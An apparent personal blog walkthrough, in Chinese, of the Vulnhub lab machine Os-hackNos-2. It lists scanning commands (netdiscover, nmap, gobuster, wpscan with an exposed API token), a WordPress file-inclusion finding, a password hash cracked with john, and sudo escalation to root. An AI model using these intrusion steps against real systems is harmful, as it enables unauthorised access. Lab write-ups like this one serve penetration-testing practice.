前言
- Vulnhub刷题简单记录
Os-hackNos-2开始
1、可以用两种方法确认靶场的存在,扫ip
1 | netdiscover -i eth0 -r 192.168.56.0/24 |
2、扫目标端口开发情况
1 | nmap -p- -T5 -A 192.168.56.107 -oA dom |
3、访问主页,爆破目录,接着发现他wp的框架
1 | gobuster dir -u http://192.168.56.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 |
4、接着用wpscan扫出LFI漏洞
1 | wpscan --url http://192.168.56.107/tsweb/ -e vp --api-token uRtscTsMbaEcsD0aaBjMdWOeFskt4NgsOnmOv1gHKI0 |
获得flag用户的密码密文,准备破解用john
1 | $1$flag$vqjCxzjtRc7PofLYS2lWf/ |
接着就登录了topsecret
5、接着在网站目录中找到备份文件中有一个rohit用户的md5hash值
1 | 用john破解 |
接着用拿到root权限
1 | sudo su root |
我的个人博客
孤桜懶契:http://gylq.gitee.io